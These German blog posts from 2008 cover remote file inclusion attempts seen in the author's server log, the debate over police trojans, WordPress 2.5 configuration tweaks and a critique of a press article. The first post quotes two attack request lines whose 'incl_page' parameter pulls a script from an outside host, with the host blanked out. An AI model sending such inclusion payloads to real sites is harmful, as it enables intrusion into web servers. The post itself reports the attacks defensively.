Einträge von Max

Hätte ich nur am Montag keinen Link auf ein Blog namens "blogator" gesetzt... Jetzt wird dieser Beitrag bei irgendwelchen Suchmaschinen mit diesem Begriff gefunden und jedes script kiddie probiert mal aus, ob er bei mir die Sicherheitslücke der zufällig gleichnamigen französischen Blogsoftware ausnützen kann. Ihr könnt mich damit in Ruhe lassen, ich verwende eine andere Software, die bestimmt Lücken, aber halt andere hat.

Mein Log ist jedenfalls voll von Versuchen der Art

GET /2008/03/31/kurzer-ausflug-nach-25// include/struct_admin.php? incl_page= http://---irgendein-provider---/ imgcls/cmd2.txt?????

Wenn man dann bei ---irgendein-provider---/ imgcls/cmd2.txt nachschaut, was da eingebunden wird, findet man ein Script, das anscheinend nur Betriebssystem, Username und Plattenplatz ausgibt. Nichts weiter tragisches, anscheinend nur die Vorbereitung spezifischerer Versuche. Die Versuche finden ausschliesslich bei diesem Beitrag statt, sind also kein Rundumschlag in irgendwelchen Blogs, sondern bestimmt das Ergebnis einer Suche bei irgendeiner Suchmaschine.

Zwei dieser Webprovider hab ich mal testweise angeschrieben, dass sie ihren Kunden bitte bescheidgeben:

• Eine Seite war bei Geocities. Da hab ich Yahoo eine Mail geschreiben. Das eigentlich dafür vorgesehene Kontaktformular wurde auf deren Server nicht gefunden...


• Der andere Provider ist ein kleiner Provider aus Coburg. Der hatte ein Formular für Petzer, zwingt mich aber, dort dazu unsinnige "Muss-Felder" mit für beide Seiten nutzlosen Infos auszufüllen. Es hat keinen Sinn, die IP-Adresse einer virenverseuchten Homepage abzutippen. Aber wenn die das möchten, geb ich gern irgendwas ein...

Die Kunden können natürlich auch wenig dafür (ausser dass sie hackbare Anwendungen ins Netz stellen), aber sie sollten wenigstens informiert sein, dass ihre Homepage über z.B. "Entgiftungspflaster mit der Kraft alter Bäume" im Nebenjob als Virenschleuder dient. Viel Erfolg versprech ich mir davon aber nicht. Bei den meisten Providern beschränkt sich das Abuse-Handling auf den Aufbau von Hürden für den Beschwerdeführer.

Ausser den aufgemachten Servern mit dem Script gibts noch einen zweiten Beteiligten, den der diese URL zusammenbastelt und bei mir aufruft. Ich vermute aber, der kann auch nichts dafür, das geht auch schon automatisch ohne Wissen und Beteiligung des Menschen vor dem Monitor. Anderfalls wären die Leute entweder alle mit Textbrowsern unterwegs oder würden im Sekundentakt den Browser wechseln (oder dessen Identifikation mit jedem aufruf wechseln lassen). Wäre denkbar, aber für Kinder eher untypisch...

Die Internetprovider dieser Leute kann ich allerdings nicht anschreiben. Da ich hier ja auf die Speicherung der IP-Adressen der Besucher verzichte, kann ich für vergangene Zugriffe die IP-Adresse der Besucher nur ungefähr sagen. Z.B. kommt dann ein verstümmeltes "bzrhbcesvl.schulradio-bayern.de" raus, damit brauche ich beim Provider nicht ankommen. Und aussschalten mag ich die Pseudonymisierung jetzt auch nicht, dazu werden auch bei Internetprovidern Hinweise der Art "He Dein Kunde hackt hier rum oder hat nen Virus" zu missmutig bearbeitet.

Nachtrag: Die suchen bei Technorati oder Google-Blogsuche nach "blogator". 2 Stunden nach Veröffentlichung tauchen die ersten Zugriffe auf diesen Beitrag auf:

/2008/04/05/falsche-luecke// _blogadata/ include/ struct_admin.php? incl_page= http:// ---egal --- /ioncube/readme.txt??

Nachtrag 2: 5 Stunden nach meiner Mail hat übrigens Geocities die Seite abgeklemmt. Ich weiss natürlich nicht, ob ich der einzige war, der was geschrieben hat, vermutlich suchen die auch selbst ihre Seiten nach Schädlingen ab. Die schnelle Reaktion hat mich jedenfalls überrascht.

Den passendsten Kommentar zum neuesten Scheingefecht der Koalition zur Online-Durchsuchung fand ich im Heise-Forum. Es geht jetzt darum, ob die Wanze auch auf dem Rechner installiert werden kann, wenn man technisch noch nicht so weit ist, das online zu erledigen. Dann muss der Polizist ja heimlich in die Wohnung einbrechen, den Trojaner installieren und wieder verschwinden. Die SPD findet nun dieses Detail (bis auf weiteres) untragbar und mit ihr nicht machbar, während der Innenexperte der CDU Clemens Binninger das ganz normal findet:

„Es liegt doch in der Natur der Sache, dass wir, wenn wir den Sicherheitsbehörden aus guten Gründen die Online-Durchsuchung erlauben, ihnen auch die Möglichkeit geben müssen, im Bedarfsfall physisch auf den Rechner zuzugreifen.“ Dabei handele es sich schließlich nicht um eine Durchsuchung der Wohnung des Verdächtigen, sondern lediglich um ein Betreten. „Und das ist von der heutigen Verfassungslage im Bereich der Gefahrenabwehr gedeckt.“

Und dazu meinte der FuntKlakow

PC verstecken

Dann reicht es also aus, den PC so zu platzieren, das man ihn nicht auf den ersten Blick sieht. Wenn er dann die Wohnung nach dem PC durchsuchen muss, handelt er rechtswidrig! ;-)

Ich finde, schöner kann man die bizarre Welt in der unsere Innenexperten anscheinend leben nicht kommentieren.

Der Ministerpräsident Beckstein erklärte heute nach der Ministerkonferrenz

"Terroristen kommunizieren heutzutage weitaus mehr als früher über Briefe und heimlich zugesteckte Zettel. Deshalb ist es dringend notwendig, die Organe der Inneren Sicherheit zu ermächtigen, heimlich in Wohnungen einzusteigen, dort alle Schubladen zu durchsuchen und so den Briefverkehr in die Hände zu bekommen."

Nein, das sagte er natürlich nicht, er sprach von der Online-Kommunikation, und der Online-Datenerhebung. "Online-Datenerhebung" ist dabei der Euphemismus für eine heimliche Durchsuchung unserer Computer über das Internet.

Sie haben nämlich inzwischen ihre Hausaufgaben gemacht, entgegen der ersten Annahme doch noch ein paar kleine Verbesserungen am Gesetzentwurf im Sinne des Verfassungsgerichts der Verfassung vorgenommen und wollen jetzt ihre Trojaner legal unters Volk bringen.

Die Begründung ist wie üblich die Kommunikation der Bösen, das Ziel muss mehr sein: sämtliche Daten. Weil mit der Kommunikation wird ja schon die "Quellen-TKÜ", auch so ein Euphemismus, begründet.

Nachtrag: Auf Bundesebene sieht man das wohl so ähnlich wie ich. Zumindest die Zöllner wollen die Quellen-TKÜ schon einsetzen. Nach Auskunft der Bundesregierung auf Basis der bestehenden Gesetze, wenn also keine neuen Gründe kommen, bräuchte es ja kein neues Gesetz...

Ich hab mir grad Wordpress 2.5 angesehen. Sieht ganz nett aus, moderner, die Bilderverwaltung scheint praktisch. Leider geht die bei mir nicht, weder mit dem Firefox noch mit dem Opera. Vermutlich hat keiner der Entwickler Linux, mit Windows und Firefox hab ichs getestet und es geht, aber ich hab zu wenig Einblick in Ajax um selbst die Ursache zu finden...

Ich warte einfach noch, muss ja nicht bei den ersten sein, die das neue Spielzeug haben. Sicherheitsupdate war es ja keiner, ich kann also auch beruhigt bei 2.3.3 bleiben. Ausserdem hab ich so mal meine Backupstrategie ausprobieren können. Es klappt, ich kam leicht zurück auf die alte Version.

Das schöne ist, dass das neue Wordpress auch eine neue Rechtschreibprüfung hat. Das heisst, meine kleine Projektarbeit "Wie bringen wir WP Deutsch bei" ist beendet! Ein Grund mehr, warum ich nicht sofort nach dem Release das Zeug installieren muss um möglichst schnell den Rechtschreibkontrolleur anzupassen.

Besser ist der Korrektor nicht geworden, aber was will man erwarten, die Vorschläge kommen ja nach wie vor von Google.

Die Vorauswahl der Sprache muss man übrigens auch hier von Hand vornehmen, zumindest war das bei mir so. Ist aber wesentlich leichter als vorher:

In der Datei "wp-includes/js/tinymce/tiny_mce_config.php" in Zeile 66 stehen alle Sprachen, die im Editor zur Verfügung stehen. Vorher stand da "+English=en,Danish=da,Dutch=nl,Finnish=...". Wenn man da das "+" vor English wegnimmt und vor "German" setzt, ist Deutsch die Voreinstellung. Bei mir steht da jetzt

$mce_spellchecker_languages =
apply_filters('mce_spellchecker_languages', 'English=en,+German=de');

Was so ziemlich alle Sprachen abdeckt, die ich beherrsche...

Nachtrag: Jetzt geht auch der Upload. Es war auch kein Ajax/Javascript-Problem, sondern die verwenden jetzt Flash zum Hochladen. Anscheinend gabs da bekannte Probleme mit Macs, deshalb wurde auch speziell auf Apfelbrowser abgefragt und dann das Flash abgeschaltet, Ubuntu bekam aber keine Extrawurst gebraten. Ich habs jetzt generell ausgeschaltet: In wp-admin/includes/media.php Zeile 770 statt $flash=true einfach $flash=false. Gefunden hab ich die Abhilfe bei blogator. Alternativ gibts auch schon ein Plugin "No-Flash-Uploader", das diesen Flashhochlader ausschaltet.

Auf den gleichzeitigen Upload mehrerer Dateien muss man so halt verzichten. Ist aber für mein Zeug hier nicht wirklich wichtig. Mehr als ein Bildchen pro Eintrag habe ich eh selten.

Was noch fehlt: Ich hab im WYSIWYG-Editor keine Möglichkeit, Links einzutragen und Bilder zu positonieren. Da gehen zwar Kontext-Fenster auf, aber die sind leer. Mach ich erstmal in der HTML-Ansicht, oder mit Opera (da gehts komischerweise, FF unter XP haut auch hin) und schnüffel mal in den Foren rum.

Lösung: Für diese Fenster hab ich mir per google das da zusammengebastel. Jetzt hörts aber dann auf mit der rumpatcherei...

In wp-includes/js/tinymce/tiny_mce_popup.js" nach Zeile 180 einfügen:
if (this.isWindow && tinyMCE.isGecko) { window.resizeBy(100, 100); }

Unter der Rubrik "Spiegel Online verwechselt wirklich alles, hat aber immer einen Experten zur Hand, der seinen Senf dazugibt", finden wir heute zum Thema "britische Firmen schauen nach, was ihre Angestellten über sie im Internet schreiben":

Ausschlaggebend für die strengen Kontrollmaßnahmen sei der Versuch, ein höheres Sicherheitsbewusstsein unter Mitarbeitern zu verbreiten. Einerseits werde versucht, vertrauliche firmeninterne Informationen besser zu schützen, andererseits gehe es um Imageschutz. Denn im Internet - besonders auf Community-Seiten wie Facebook oder MySpace - würden Mitarbeiter ihre Arbeitsstätte oft nicht in besonders gutem Licht erscheinen lassen, heißt es in dem Bericht.

"Eine derartige Überwachung wäre auch in Deutschland gesetzlich legitim", erklärt Verena Eckert, Rechtsexpertin der Münchner IT-Recht-Kanzlei im Gespräch mit dem Internetdienst pressetext. Entscheidendes Kriterium sei, ob das Unternehmen seinen Beschäftigten überhaupt eine private Nutzung des Internets am Arbeitsplatz gestatte. Wenn ein Internetzugang für dienstliche Zwecke nicht unbedingt notwendig sei, könne das Unternehmen private Nutzung generell verbieten. Sei diese dagegen erlaubt, habe der Arbeitgeber auch das Recht, die Online-Aktivitäten seiner Angestellten zu kontrollieren.

Nicht beachtet wird dabei leider, dass zum Beispiel meine Kommentare zu meinem Arbeitgeber nicht zwingend von der Arbeit aus erstellt werden. Die meiste Zeit zum Blog-schreiben wende ich ja schon zuhause auf. Ausserdem vermisse ich den Hinweis, dass private Nutzung auch dann verboten sein kann, wenn dienstliche Nutzung notwendig ist. Falls nämlich privates verboten und dienstliches nicht nötig ist, wäre abstecken eine sinnvolle Option.

"Sei diese dagegen erlaubt, habe der Arbeitgeber auch das Recht, die Online-Aktivitäten seiner Angestellten zu kontrollieren." steht leider  ohne weitere Erklärung in gewissem Widerspruch zur Aussage im nächsten Absatz:

"Gleichzeitig ist der Arbeitgeber aber auch dazu verpflichtet, die Geheimnisse seiner Mitarbeiter zu schützen."

Ausserdem wäre ja die Kontrolle bei einem Verbot nur noch erlaubter.

Insgesamt bleibt der Leser nur verwirrt zurück und fragt sich, ob er so doof ist, der Redakteur oder die Expertin. Die, vermute ich, ist unschuldig. Vermutlich hat einfach jemand die Fragen an sie ausgetauscht. Jedenfalls passt der zweite zitierte Absatz mit der Antwort nicht zum Problem, das im ersten Absatz aufgeworfen wird.